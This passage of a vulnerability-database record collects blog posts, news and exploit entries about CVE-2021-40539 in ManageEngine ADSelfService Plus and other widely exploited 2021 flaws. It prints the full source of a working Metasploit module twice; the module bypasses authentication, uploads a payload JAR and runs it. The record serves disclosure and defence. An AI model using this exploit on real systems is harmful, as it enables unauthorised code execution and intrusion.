proof-of-concept (PoC) methodologies which anyone can copy and use.\n\nMicrosoft\u2019s Security Update from May 2021 remediates all three ProxyShell vulnerabilities.\n\n## 4\\. ProxyLogon\n\nAfter the ProxyShell entries we go straight to four vulnerabilities that are grouped under a similar name\u2014[ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>)\u2014for similar reasons. [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-2685](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) all share the same description\u2014"This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443."\n\nWhile the CVE description is the same for the 4 CVE\u2019s we have learned that CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that was used to steal mailbox content. The RCE vulnerability CVE-2021-26857 was used to run code under the System account. The other two zero-day flaws\u2014CVE-2021-26858 and CVE-2021-27065\u2014would allow an attacker to write a file to any part of the server.\n\nTogether these four vulnerabilities form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, threat actors deployed web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.\n\nProxyLogon started out as a limited and targeted attack method attributed to a group called [Hafnium](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>). Unfortunately it went from limited and targeted attacks to a full-size panic in no time. Attackers started using the Exchange bugs to access vulnerable servers before establishing web shells to gain persistence and steal information.\n\nMicrosoft has released a one-click mitigation tool for Exchange Server deployments. The Microsoft Exchange On-Premises Mitigation Tool will help customers who do not have dedicated security or IT teams to apply these security updates. Details, a [download link](<https://aka.ms/eomt>), user instructions, and more information can be found in the [Microsoft Security Response Center](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n\n## 5\\. CVE-2021-26084\n\n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>) is an Object-Graph Navigation Language (OGNL) injection vulnerability that exists in some versions of [Confluence Server and Data Center](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) that can allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. This was a zero-day vulnerability that was only patched after it was found to be actively exploited in the wild. An attacker could exploit the vulnerability by simply sending a specially crafted HTTP request containing a malicious parameter to a vulnerable install.\n\nShortly after the vulnerability was disclosed and a patch came out, researchers noticed massive scanning activity for vulnerable instances and crypto-miners started to use the vulnerability to run their code on unpatched servers.\n\nOn the [Confluence Support website](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) you can find a list of affected versions, instructions to upgrade, and a workaround for those that are unable to upgrade.\n\n## Lessons learned\n\nWhat does this list tell us to look out for in 2022?\n\nWell, first off, if you haven\u2019t patched one of the above we would urgently advise you to do so. And it wouldn\u2019t hurt to continue working down the [list](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) provided by CISA.\n\nSecond, you may have noticed a pattern in what made these vulnerabilities so popular to exploit:\n\n * **A large attack surface**. Popular and widely used software makes for a larger number of potential victims. The money is in the numbers.\n * **Internet-facing instances**. Remember, your Internet-connected software shares the Internet with every basement-dwelling criminal hacker in the world.\n * **Easy exploitability**. When vulnerabilities are easy to exploit, and PoCs are publicly available and easy to deploy, the number of potential threat actors goes up.\n\nSo, if you notice or hear about a vulnerability that meets these "requirements" move it to the top of your "to-patch" list.\n\nStay safe, everyone!\n\nThe post [The top 5 most routinely exploited vulnerabilities of 2021](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-29T16:28:20", "type": "malwarebytes", "title": "The top 5 most routinely exploited vulnerabilities of 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-2685", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-04-29T16:28:20", "id": "MALWAREBYTES:B8C767042833344389F6158273089954", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2021-11-27T05:17:02", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-27T00:00:00", "type": "packetstorm", "title": "ManageEngine ADSelfService Plus Authentication Bypass / Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-27T00:00:00", "id": "PACKETSTORM:165085", "href": "https://packetstormsecurity.com/files/165085/ManageEngine-ADSelfService-Plus-Authentication-Bypass-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::Java::HTTP::ClassLoader # TODO: Refactor this \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'ManageEngine ADSelfService Plus CVE-2021-40539', \n'Description' => %q{ \nThis module exploits CVE-2021-40539, a REST API authentication bypass \nvulnerability in ManageEngine ADSelfService Plus, to upload a JAR and \nexecute it as the user running ADSelfService Plus - which is SYSTEM if \nstarted as a service. \n}, \n'Author' => [ \n# Discovered by unknown threat actors \n'Antoine Cervoise', # Independent analysis and RCE \n'Wilfried B\u00e9card', # Independent analysis and RCE \n'mr_me', # keytool classloading technique \n'wvu' # Initial analysis and module \n], \n'References' => [ \n['CVE', '2021-40539'], \n['URL', 'https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html'], \n['URL', 'https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis'], \n['URL', 'https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html'], \n['URL', 'https://github.com/synacktiv/CVE-2021-40539/blob/main/exploit.py'] \n], \n'DisclosureDate' => '2021-09-07', \n'License' => MSF_LICENSE, \n'Platform' => 'java', \n'Arch' => ARCH_JAVA, \n'Privileged' => false, # true if ADSelfService Plus is run as a service \n'Targets' => [ \n['Java Dropper', {}] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 8888 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'Path traversal for auth bypass', '/./']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'), \n'vars_post' => { \n'methodToCall' => 'previewMobLogo' \n} \n) \n \nunless res \nreturn CheckCode::Unknown('Target failed to respond to check.') \nend \n \nunless res.code == 200 && res.body.match?(%r{mobLogo.*/temp/tempMobPreview\\.jpeg}) \nreturn CheckCode::Safe('Failed to bypass REST API authentication.') \nend \n \nCheckCode::Vulnerable('Successfully bypassed REST API authentication.') \nend \n \ndef exploit \nupload_payload_jar \nexecute_payload_jar \nend \n \ndef upload_payload_jar \nprint_status(\"Uploading payload JAR: #{jar_filename}\") \n \njar = payload.encoded_jar \njar.add_file(\"#{class_name}.class\", constructor_class) # Hack, tbh \n \nform = Rex::MIME::Message.new \nform.add_part('unspecified', nil, nil, 'form-data; name=\"methodToCall\"') \nform.add_part('yas', nil, nil, 'form-data; name=\"Save\"') \nform.add_part('smartcard', nil, nil, 'form-data; name=\"form\"') \nform.add_part('Add', nil, nil, 'form-data; name=\"operation\"') \nform.add_part(jar.pack, 'application/java-archive', 'binary', \n%(form-data; name=\"CERTIFICATE_PATH\"; filename=\"#{jar_filename}\")) \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'), \n'ctype' => \"multipart/form-data; boundary=#{form.bound}\", \n'data' => form.to_s \n) \n \nunless res&.code == 404 \nfail_with(Failure::NotVulnerable, 'Failed to upload payload JAR') \nend \n \n# C:\\ManageEngine\\ADSelfService Plus\\bin (working directory) \nregister_file_for_cleanup(jar_filename) \n \nprint_good('Successfully uploaded payload JAR') \nend \n \ndef execute_payload_jar \nprint_status('Executing payload JAR') \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/RestAPI/Connection'), \n'vars_post' => { \n'methodToCall' => 'openSSLTool', \n'action' => 'generateCSR', \n# https://docs.oracle.com/javase/8/docs/technotes/tools/unix/keytool.html \n'VALIDITY' => \"#{rand(1..365)} -providerclass #{class_name} -providerpath #{jar_filename}\" \n} \n) \n \nunless res&.code == 404 \nfail_with(Failure::PayloadFailed, 'Failed to execute payload JAR') \nend \n \nprint_good('Successfully executed payload JAR') \nend \n \ndef jar_filename \n@jar_filename ||= \"#{rand_text_alphanumeric(8..16)}.jar\" \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/165085/manageengine_adselfservice_plus_cve_2021_40539.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "krebs": [{"lastseen": "2022-02-16T19:27:08", "description": "A network intrusion at the **International Committee for the Red Cross** (ICRC) in January led to the theft of personal information on more than 500,000 people receiving assistance from the group. KrebsOnSecurity has learned that the email address used by a cybercriminal actor who offered to sell the stolen ICRC data also was used to register multiple domain names the FBI says are tied to a sprawling media influence operation originating from Iran.\n\n![](https://krebsonsecurity.com/wp-content/uploads/2022/02/icrc-sca.png)\n\nOn Jan. 19, the ICRC disclosed the compromise of servers hosting the personal information of more than 500,000 people receiving services from the [Red Cross and Red Crescent Movement](<https://en.wikipedia.org/wiki/International_Red_Cross_and_Red_Crescent_Movement>). The ICRC said the hacked servers contained data relating to the organization's **Restoring Family Links** services, which works to reconnect people separated by war, violence, migration and other causes.\n\nThe same day the ICRC went public with its breach, someone using the nickname "**Sheriff**" on the English-language cybercrime forum **RaidForums** advertised the sale of data from the Red Cross and Red Crescent Movement. Sheriff's sales thread suggests the ICRC was asked to pay a ransom to guarantee the data wouldn't be leaked or sold online.\n\n"Mr. Mardini, your words have been heard," Sheriff wrote, posting a link to the Twitter profile of **ICRC General Director Robert Mardini** and urging forum members to tell him to check his email. "Check your email and send a figure you can pay."\n\n![](https://krebsonsecurity.com/wp-content/uploads/2022/02/sheriff-icrc.png)\n\nRaidForums member "unindicted" aka Sheriff selling access to the International Red Cross and Red Crescent Movement data. Image: Ke-la.com\n\nIn their [online statement about the hack](<https://www.icrc.org/en/document/cyber-attack-icrc-what-we-know>) (updated on Feb. 7) the ICRC said it had not had any contact with the hackers, and no ransom demand had been made.\n\n"In line with our standing practice to engage with any actor who can facilitate or impede our humanitarian work, we are willing to communicate directly and confidentially with whoever may be responsible for this operation to impress upon them the need to respect our humanitarian action," the ICRC statement reads.\n\nAsked to comment on Sheriff's claims, the ICRC issued the following statement:\n\n"Right now, we do not have any conclusive evidence that this information from the data breach has been published or is being traded. Our cybersecurity team has looked into any reported allegation of data being available on the dark web."\n\n**Update, 2:00 p.m., ET:** The ICRC just published an update to its [FAQ on the breach](<https://www.icrc.org/en/document/cyber-attack-icrc-what-we-know>). The ICRC now says the hackers broke in on Nov. 9, 2021, using an unpatched critical vulnerability (CVE-2021-40539). "This vulnerability allows malicious cyber actors to place web shells and conduct post-exploitation activities such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files. Once inside our network, the hackers were able to deploy offensive security tools which allowed them to disguise themselves as legitimate users or administrators. This in turn allowed them to access the data, despite this data being encrypted."\n\n_Original story:_\n\nThe email address that Sheriff used to register at RaidForums -- **kelvinmiddelkoop@hotmail.com** -- appears in [an affidavit for a search warrant filed by the FBI](<https://www.justice.gov/usao-ndca/press-release/file/1334571/download>) roughly a year ago. That FBI warrant came on the heels of [an investigation published by security firm **FireEye**](<https://www.mandiant.com/resources/report-suspected-iranian-influence-operation>), which examined an Iranian-based network of inauthentic news sites and social media accounts aimed at the United States., U.K. and other western audiences.\n\n"This operation is leveraging a network of inauthentic news sites and clusters of associated accounts across multiple social media platforms to promote political narratives in line with Iranian interests," FireEye researchers wrote. "These narratives include anti-Saudi, anti-Israeli, and pro-Palestinian themes, as well as support for specific U.S. policies favorable to Iran."\n\n![](https://krebsonsecurity.com/wp-content/uploads/2022/02/lfp.png)\n\nThe FBI says the domains registered by the email address tied to Sheriff's RaidForums account were used in service of the Liberty Front Press, a network of phony news sites thought to originate from Iran.\n\nAccording to the FBI affidavit, the address kelvinmiddelkoop@hotmail.com was used to register at least three different domains for phony news sites, including awdnews[.]com, sachtimes[.]com, and whatsupic[.]com. A reverse WHOIS search on that email address at [DomainTools.com](<https://www.domaintools.com>) (an advertiser on this site) shows it was used to register 17 domains between 2012 and 2021, including moslimyouthmedia[.]com, moslempress[.]com, and realneinovosti[.]net.\n\nA review of Sheriff's postings to RaidForum reveals he has used two other nicknames since registering on the forum in December 2021: "**Unindicted**," and "**threat_actor**." In several posts, Sheriff taunts one FireEye employee by name.\n\nIn a Jan. 3, 2022 post, Sheriff says their "team" is seeking licenses for the Cobalt Strike penetration testing tool, and that they're prepared to pay $3,000 - $4,000 per license. Cobalt Strike is a legitimate security product that is sold only to vetted partners, but compromised or ill-gotten Cobalt Strike licenses [frequently are used in the run-up to ransomware attacks](<https://www.secureworks.com/blog/detecting-cobalt-strike-cybercrime-attacks>).\n\n"We will buy constantly, make contact," Sheriff advised. "Do not ask if we still need)) the team is interested in licenses indefinitely."\n\nOn Jan. 4, 2022, Sheriff tells RaidForums that their team is in need of access to a specific data broker platform, and offers to pay as much as $35,000 for that access. Sheriff says they will only accept offers that are guaranteed through the forum's escrow account.\n\nThe demand for escrow in a sales thread is almost universally a sign that someone means business and they are ready to transact on whatever was advertised or requested. That's because escrow transactions necessarily force the buyer to make a deposit with the forum's administrators before proceeding on any transaction.\n\nSheriff appears to have been part of a group on RaidForums that [offered to buy access to organizations that could be extorted with ransomware or threatened with the publication of stolen data](<https://krebsonsecurity.com/wp-content/uploads/2022/02/kela-scrape.pdf>) (PDF screenshot from threat intelligence firm [KELA](<https://ke-la.com>)). In a "scam report" filed against Sheriff by another RaidForums member on Dec. 31, 2021, the claimant says Sheriff bought access from them and agreed to pay 70 percent of any ransom paid by the victim organization.\n\nInstead, the claimant maintains, Sheriff only paid them roughly 25 percent. "The company pay $1.35 million ransom and only payment was made of $350k to me, so i ask for $600k to fix this dispute," the affiliate wrote.\n\nIn another post on RaidForums, a user aptly named "FBI Agent" advised other denizens to steer clear of Sheriff's ransomware affiliate program, noting that transacting with this person could run afoul of sanctions from the U.S. Department of the Treasury's **Office of Foreign Assets Control** (OFAC) that restrict commerce with people residing in Iran.\n\n"To make it clear, we don't work with individuals under the OFAC sanctions list, which @Sheriff is under," the ransomware affiliate program administrator wrote in reply.\n\nRaidForums says Sheriff was referred to the forum by **Pompompurin**, the same hacker who used a security hole in the FBI's website last year [to blast a phony alert about a cybercrime investigation to state and local authorities](<https://krebsonsecurity.com/2021/11/hoax-email-blast-abused-poor-coding-in-fbi-website/>). Pompompurin has been quite active on RaidForums for the past few years, frequently posting databases from newly-hacked organizations, and [selling access to stolen information](<https://www.securityweek.com/fbi-hacker-offers-sell-data-allegedly-stolen-robinhood-breach>).\n\nReach via Twitter, Pompompurin said they had no idea who might have offered money and information on Sheriff, and that they would never "snitch" on Sheriff.\n\n"I know who he is but I'm not saying anything," Pompompurin replied.\n\nThe information about Sheriff was brought to my attention by an anonymous person who initially contacted KrebsOnSecurity saying they wanted to make a donation to the publication. When the person offering the gift asked if it was okay that the money came from a ransomware transaction, I naturally declined the offer.\n\nThat person then proceeded to share the information about the connection between Sheriff's email address and the FBI search warrant, as well as the account's credentials.\n\nThe same identity approached several other security researchers and journalists, one of whom was able to validate that the kelvinmiddelkoop@hotmail.com address actually belonged to Sheriff's account. Those researchers were likewise offered tainted donations, except the individual offering the donation seemed to use a different story with each person about who they were or why they were offering money. Others contacted by the same anonymous user said they also received unsolicited details about Sheriff.\n\nIt seems clear that whoever offered that money and information has their own agenda, which may also involve attempts to make members of the news media appear untrustworthy for agreeing to accept stolen funds. However, the information they shared checks out, and since there is precious little public reporting on the source of the ICRC intrusion, the potential connection to hacker groups based in Iran seems worth noting.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-16T16:44:19", "type": "krebs", "title": "Red Cross Hack Linked to Iranian Influence Operation?", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2022-02-16T16:44:19", "id": "KREBS:69ADDAD13D83673CDE629B3AD655DD29", "href": "https://krebsonsecurity.com/2022/02/red-cross-hack-linked-to-iranian-influence-operation/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-06-24T08:36:53", "description": "This module exploits CVE-2021-40539, a REST API authentication bypass vulnerability in ManageEngine ADSelfService Plus, to upload a JAR and execute it as the user running ADSelfService Plus - which is SYSTEM if started as a service.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-24T01:05:09", "type": "metasploit", "title": "ManageEngine ADSelfService Plus CVE-2021-40539", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-24T16:44:59", "id": "MSF:EXPLOIT-WINDOWS-HTTP-MANAGEENGINE_ADSELFSERVICE_PLUS_CVE_2021_40539-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/manageengine_adselfservice_plus_cve_2021_40539/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::Java::HTTP::ClassLoader # TODO: Refactor this\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'ManageEngine ADSelfService Plus CVE-2021-40539',\n 'Description' => %q{\n This module exploits CVE-2021-40539, a REST API authentication bypass\n vulnerability in ManageEngine ADSelfService Plus, to upload a JAR and\n execute it as the user running ADSelfService Plus - which is SYSTEM if\n started as a service.\n },\n 'Author' => [\n # Discovered by unknown threat actors\n 'Antoine Cervoise', # Independent analysis and RCE\n 'Wilfried B\u00e9card', # Independent analysis and RCE\n 'mr_me', # keytool classloading technique\n 'wvu' # Initial analysis and module\n ],\n 'References' => [\n ['CVE', '2021-40539'],\n ['URL', 'https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html'],\n ['URL', 'https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis'],\n ['URL', 'https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html'],\n ['URL', 'https://github.com/synacktiv/CVE-2021-40539/blob/main/exploit.py']\n ],\n 'DisclosureDate' => '2021-09-07',\n 'License' => MSF_LICENSE,\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA,\n 'Privileged' => false, # true if ADSelfService Plus is run as a service\n 'Targets' => [\n ['Java Dropper', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8888\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Path traversal for auth bypass', '/./'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'),\n 'vars_post' => {\n 'methodToCall' => 'previewMobLogo'\n }\n )\n\n unless res\n return CheckCode::Unknown('Target failed to respond to check.')\n end\n\n unless res.code == 200 && res.body.match?(%r{mobLogo.*/temp/tempMobPreview\\.jpeg})\n return CheckCode::Safe('Failed to bypass REST API authentication.')\n end\n\n CheckCode::Vulnerable('Successfully bypassed REST API authentication.')\n end\n\n def exploit\n upload_payload_jar\n execute_payload_jar\n end\n\n def upload_payload_jar\n print_status(\"Uploading payload JAR: #{jar_filename}\")\n\n jar = payload.encoded_jar\n jar.add_file(\"#{class_name}.class\", constructor_class) # Hack, tbh\n\n form = Rex::MIME::Message.new\n form.add_part('unspecified', nil, nil, 'form-data; name=\"methodToCall\"')\n form.add_part('yas', nil, nil, 'form-data; name=\"Save\"')\n form.add_part('smartcard', nil, nil, 'form-data; name=\"form\"')\n form.add_part('Add', nil, nil, 'form-data; name=\"operation\"')\n form.add_part(jar.pack, 'application/java-archive', 'binary',\n %(form-data; name=\"CERTIFICATE_PATH\"; filename=\"#{jar_filename}\"))\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'),\n 'ctype' => \"multipart/form-data; boundary=#{form.bound}\",\n 'data' => form.to_s\n )\n\n unless res&.code == 404\n fail_with(Failure::NotVulnerable, 'Failed to upload payload JAR')\n end\n\n # C:\\ManageEngine\\ADSelfService Plus\\bin (working directory)\n register_file_for_cleanup(jar_filename)\n\n print_good('Successfully uploaded payload JAR')\n end\n\n def execute_payload_jar\n print_status('Executing payload JAR')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/Connection'),\n 'vars_post' => {\n 'methodToCall' => 'openSSLTool',\n 'action' => 'generateCSR',\n # https://docs.oracle.com/javase/8/docs/technotes/tools/unix/keytool.html\n 'VALIDITY' => \"#{rand(1..365)} -providerclass #{class_name} -providerpath #{jar_filename}\"\n }\n )\n\n unless res&.code == 404\n fail_with(Failure::PayloadFailed, 'Failed to execute payload JAR')\n end\n\n print_good('Successfully executed payload JAR')\n end\n\n def jar_filename\n @jar_filename ||= \"#{rand_text_alphanumeric(8..16)}.jar\"\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/manageengine_adselfservice_plus_cve_2021_40539.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mssecure": [{"lastseen": "2021-11-09T18:34:15", "description": "Microsoft has detected exploits being used to compromise systems running the ZOHO ManageEngine ADSelfService Plus software versions vulnerable to [CVE-2021-40539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539>) in a targeted campaign. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to DEV-0322, a group operating out of China, based on observed infrastructure, victimology, tactics, and procedures.\n\nMSTIC previously highlighted DEV-0322 activity related to [attacks targeting the SolarWinds Serv-U software with 0-day exploit](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>). As with any observed nation-state actor activity, Microsoft notifies customers that have been targeted or compromised, providing them with the information they need to help secure their accounts.\n\nOur colleagues at Palo Alto Unit 42 have also highlighted this activity in [their recent blog](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>). We thank Unit 42 for their collaboration as industry partners and ongoing efforts to protect customers. We would also like to thank our partners in [Black Lotus Labs](<https://www.lumen.com/en-us/security/black-lotus-labs.html>) at Lumen Technologies for their contributions to our efforts to track and mitigate this threat.\n\nThis blog shares what Microsoft has observed in the latest DEV-0322 campaign and inform our customers of protections in place through our security products. We have not observed any exploit of Microsoft products in this activity.\n\nMSTIC uses DEV-#### designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we can reach high confidence about the origin or identity of the actor behind the activity. Once it meets defined criteria, a DEV group is converted to a named actor.\n\n## Activity description\n\nMSTIC first observed the latest DEV-0322 campaign on September 22, 2021, with activity against targets that appear to be in the Defense Industrial Base, higher education, consulting services, and information technology sectors. Following initial exploitation of CVE-2021-40539 on a targeted system, DEV-0322 performed several activities including credential dumping, installing custom binaries, and dropping malware to maintain persistence and move laterally within the network.\n\n### Credential dumping\n\nIn this campaign, DEV-0322 was observed performing credential dumping using the following commands:\n\n![Screenshot of commands related to credential dumping](https://www.microsoft.com/security/blog/uploads/securityprod/2021/11/Commands-aa.png)\n\nDEV-0322 also occasionally deployed a tool to specifically read security event logs and look for Event ID 4624 events. Next, their tool would collect domains, usernames, and IP addresses and write them to the file _elrs.txt_. They typically called this tool _elrs.exe_, and below is an example of how they would call it:\n\n![Screenshot of command for calling elrs.exe](https://www.microsoft.com/security/blog/uploads/securityprod/2021/11/Commands-b-6189b796bd58d.png)\n\nAfter gaining credentials, DEV-0322 was observed moving laterally to other systems on the network and dropping a custom IIS module with the following command:\n\n![Screenshot of command for moving laterally and dropping a custom IIS module](https://www.microsoft.com/security/blog/uploads/securityprod/2021/11/Commands-c-6189b7a102d37.png)\n\n### Installing custom IIS module\n\nThe _gac.exe_ binary installs 